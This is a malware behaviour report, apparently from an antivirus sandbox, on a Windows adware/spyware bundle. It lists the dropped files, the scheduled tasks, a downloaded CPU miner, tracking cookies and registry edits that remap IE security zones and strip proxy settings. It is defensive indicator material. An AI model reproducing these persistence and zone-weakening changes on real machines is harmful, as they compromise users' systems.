%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\av.txt (0 bytes)
The process 2835.exe:792 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\chrome.packed.7z (1424068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\agoda.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ikea.ico (2993 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282 (0 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (0 bytes)
The process encrypt.exe:644 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (92831 bytes)
The process encrypt.exe:1796 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (31991 bytes)
The process encrypt.exe:1900 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (1271 bytes)
The process encrypt.exe:1484 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (24254 bytes)
The process upgmsd_re_005010082.exe:380 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
The process nsd33.tmp:432 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh37.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (20 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (0 bytes)
The process nskA.tmp:1676 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF.tmp (17738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc43.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsc14.tmp:1452 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi16.tmp (0 bytes)
Registry activity
The process nsb27.tmp:1920 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 42 2C 88 A7 C5 1A 8A 3A 37 A7 64 BC 62 21 37"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes with no dots in their name that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst20.tmp:1040 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 11 4B 05 03 E9 58 DA 3C B5 64 8D FB 75 3B 34"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
